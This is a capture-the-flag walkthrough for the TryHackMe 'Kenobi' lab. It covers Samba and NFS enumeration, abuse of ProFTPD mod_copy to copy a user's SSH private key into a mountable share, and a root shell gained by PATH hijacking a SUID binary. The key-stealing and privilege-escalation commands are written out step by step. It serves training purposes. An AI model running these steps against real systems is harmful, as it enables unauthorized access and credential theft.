# Red Team Training Series : Kenobi
###### tags: `cybersecurity` `exploit` `samba` `tutorials`
walkthrough for Kenobi room on THM
## Enumerating Samba for shares
Samba is the standard windows interoperability suite of programs for linux and unix.
It allows end users to access and use files, printers, and other commonly shared resources on a companies intranet or internet.
Commonly reffered to as a Network file system.
Samba is based on the common **client/server protocol of smb**
Without samba, other computer platforms would be isolated from windows machines even if they were part of the same network.
We can use nmap to enumerate a machine for samba shares
syntax: **nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse**
SMB has two ports:
* Port 139: SMB orginally ran on top of netbios using port 139.NETBIOS is an older transport layer that allows windows computers to talk to each other on the same network.
* Port 445: Versions of SMB after Win2000 began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.
RPCbind is a service that converts RPC (Remote procedure call) program number into universal addresses.
When RPC is started it tells rpcbind the address at which it is listening and the RPC program number its prepared to server.
We inspect the share with smbclient
syntax: **smbclient //[IP]/[share]**
We download the share recursively to go through files of interest
syntax: **smbget -R smb://[ip]/[share]**
in our case: port 111 ,running rpcbind , is access to a network file system
using nmap to enumerate it
syntax: **nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount [ip]**
from this we see that the /var mount is accessible.
## Gain initial access with proftpd
Proftpd is a free and open-source ftp server, compatible with unix and windows systems.
To get the proftpd version, we use netcat
syntax: **nc [ip] [port]**
Then we look up vulnerabilities for that version using searchsploit
syntax: **searchsploit proftpd[version]**
We find a **mod_copy** module that implements **SITE CPFR** and **SITE CPTO** commands which can be used to copy files / directories from one place to another on the server.
Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
We copy kenobi's private key using the mod_copy
1. SITE CPFR /home/kenobi/.ssh/id_rsa
2. SITE CPTO /var/tmp/id_rsa
Because we had identified the /var folder as being accesible earlier on.
We mount the /var/tmp directory to our machine
syntax: **mount [ip]:/[directory] [destination path]**
With the network mount on our machine, we go into var and retrieve the copied ssh key.
Login as kenobi with the ssh key after changing permissions to root only access.
**chmod 600 id_rsa**
**ssh kenobi@[ip] -i id_rsa**
## Privilege escalation with Path variable Manipulation
A SUID bit allows programs to be executed with the permissions of the file owner.
Custom file with suids are great for compromising systems.
To search a system for suid files use:
**find / -perm -u=s -type f 2>/dev/null**
The binary is running without a full path.
Leveraging this, we set our own path:
* echo /bin/sh >curl
* chmod 777 curl
* export PATH=/tmp:$PATH
* /usr/bin/menu
We Copy the /bin/sh shell, call it curl, modify permissions appropriately, put its location in our path.
When we run /usr/bin/menu it uses our PATH variable to find the curl binary which actually runs a root shell :)
### Where are the pictures?
Well funny story, I mounted the share to the working folder that I was saving my work on. Then killed the vm before exporting the files.
Don't make my mistakes :)
Sign in with Wallet
Connect another wallet